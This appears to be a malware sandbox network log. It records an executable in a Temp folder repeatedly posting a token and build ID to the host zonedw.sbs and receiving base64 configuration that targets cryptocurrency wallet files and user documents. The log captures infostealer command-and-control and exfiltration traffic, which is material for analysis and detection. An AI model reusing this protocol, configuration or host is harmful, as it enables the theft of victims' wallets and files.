                                                                                                                                                                                                                                                2024-12-13 12:53:02 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 58 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 58 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 58 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------KXBA1VAI58YMYU379R1DContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------KXBA1VAI58YMYU379R1DContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------KXBA1VAI58YMYU379R1DCont
                                                                                                                                                                                                                                                2024-12-13 12:53:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:03 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:53:03 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                23192.168.2.449924116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:05 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KFUAIWTJM7GVAAIM7GLN
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:53:05 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 55 41 49 57 54 4a 4d 37 47 56 41 41 49 4d 37 47 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 55 41 49 57 54 4a 4d 37 47 56 41 41 49 4d 37 47 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 55 41 49 57 54 4a 4d 37 47 56 41 41 49 4d 37 47 4c 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------KFUAIWTJM7GVAAIM7GLNContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------KFUAIWTJM7GVAAIM7GLNContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------KFUAIWTJM7GVAAIM7GLNCont
                                                                                                                                                                                                                                                2024-12-13 12:53:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:06 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:53:06 UTC536INData Raw: 32 30 63 0d 0a 5a 47 6c 7a 66 43 56 45 55 6b 6c 57 52 56 39 47 53 56 68 46 52 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 63 6d 56 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 64 58 4e 38 4a 56 56 54 52 56 4a 51 55 6b 39 47 53 55 78 46 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 71 63 47 63 73 4b 69 35 71 63 47 56 6e 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 78 45 5a 57 5a 68 64 57 78 30 66 43 56 45 54 30 4e 56 54 55
                                                                                                                                                                                                                                                Data Ascii: 20cZGlzfCVEUklWRV9GSVhFRCVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8cmV8JURSSVZFX1JFTU9WQUJMRSVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8dXN8JVVTRVJQUk9GSUxFJVx8Ki50eHQsKi5qcGcsKi5qcGVnfDUwfGZhbHNlfCp3aW5kb3dzKnxEZWZhdWx0fCVET0NVTU


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                24192.168.2.449930116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:08 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----A1N7QQQQ1DJE3EK6FKFK
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1825
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:53:08 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 41 31 4e 37 51 51 51 51 31 44 4a 45 33 45 4b 36 46 4b 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 41 31 4e 37 51 51 51 51 31 44 4a 45 33 45 4b 36 46 4b 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 31 4e 37 51 51 51 51 31 44 4a 45 33 45 4b 36 46 4b 46 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------A1N7QQQQ1DJE3EK6FKFKContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------A1N7QQQQ1DJE3EK6FKFKContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------A1N7QQQQ1DJE3EK6FKFKCont
                                                                                                                                                                                                                                                2024-12-13 12:53:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:08 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:53:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                25192.168.2.449932116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:10 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----OZCB16PZUA1N7YMYCJWB
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1837
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:53:10 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 36 50 5a 55 41 31 4e 37 59 4d 59 43 4a 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 36 50 5a 55 41 31 4e 37 59 4d 59 43 4a 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 36 50 5a 55 41 31 4e 37 59 4d 59 43 4a 57 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------OZCB16PZUA1N7YMYCJWBContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------OZCB16PZUA1N7YMYCJWBContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------OZCB16PZUA1N7YMYCJWBCont
                                                                                                                                                                                                                                                2024-12-13 12:53:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:11 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:53:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                26192.168.2.449937116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:11 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----O8GDJEKN7YCJEUK6P8GV
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1837
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:53:11 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 38 47 44 4a 45 4b 4e 37 59 43 4a 45 55 4b 36 50 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 44 4a 45 4b 4e 37 59 43 4a 45 55 4b 36 50 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 44 4a 45 4b 4e 37 59 43 4a 45 55 4b 36 50 38 47 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------O8GDJEKN7YCJEUK6P8GVContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------O8GDJEKN7YCJEUK6P8GVContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------O8GDJEKN7YCJEUK6P8GVCont
                                                                                                                                                                                                                                                2024-12-13 12:53:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:12 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:53:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                27192.168.2.449939116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:13 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----3WTR1VKF37QIM7Q1DTJ5
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1825
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:53:13 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 33 57 54 52 31 56 4b 46 33 37 51 49 4d 37 51 31 44 54 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 33 57 54 52 31 56 4b 46 33 37 51 49 4d 37 51 31 44 54 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 33 57 54 52 31 56 4b 46 33 37 51 49 4d 37 51 31 44 54 4a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------3WTR1VKF37QIM7Q1DTJ5Content-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------3WTR1VKF37QIM7Q1DTJ5Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------3WTR1VKF37QIM7Q1DTJ5Cont
                                                                                                                                                                                                                                                2024-12-13 12:53:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:14 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:53:14 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                28192.168.2.449945116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:15 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ZCJMOHLXBIE3EUS0HDTR
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1817
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:53:15 UTC1817OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 48 4c 58 42 49 45 33 45 55 53 30 48 44 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 48 4c 58 42 49 45 33 45 55 53 30 48 44 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 48 4c 58 42 49 45 33 45 55 53 30 48 44 54 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------ZCJMOHLXBIE3EUS0HDTRContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------ZCJMOHLXBIE3EUS0HDTRContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------ZCJMOHLXBIE3EUS0HDTRCont
                                                                                                                                                                                                                                                2024-12-13 12:53:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:15 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:53:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                29192.168.2.449952116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:17 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----L6XTRQ1VS0ZM7Q9HD26X
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1817
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:53:17 UTC1817OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------L6XTRQ1VS0ZM7Q9HD26XContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------L6XTRQ1VS0ZM7Q9HD26XContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------L6XTRQ1VS0ZM7Q9HD26XCont
                                                                                                                                                                                                                                                2024-12-13 12:53:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:18 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:53:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                30192.168.2.449958116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:19 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----NOHDBAIWTRQQQQ1DJEU3
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 453
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:53:19 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 4f 48 44 42 41 49 57 54 52 51 51 51 51 31 44 4a 45 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4e 4f 48 44 42 41 49 57 54 52 51 51 51 51 31 44 4a 45 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4e 4f 48 44 42 41 49 57 54 52 51 51 51 51 31 44 4a 45 55 33 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------NOHDBAIWTRQQQQ1DJEU3Content-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------NOHDBAIWTRQQQQ1DJEU3Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------NOHDBAIWTRQQQQ1DJEU3Cont
                                                                                                                                                                                                                                                2024-12-13 12:53:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:20 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
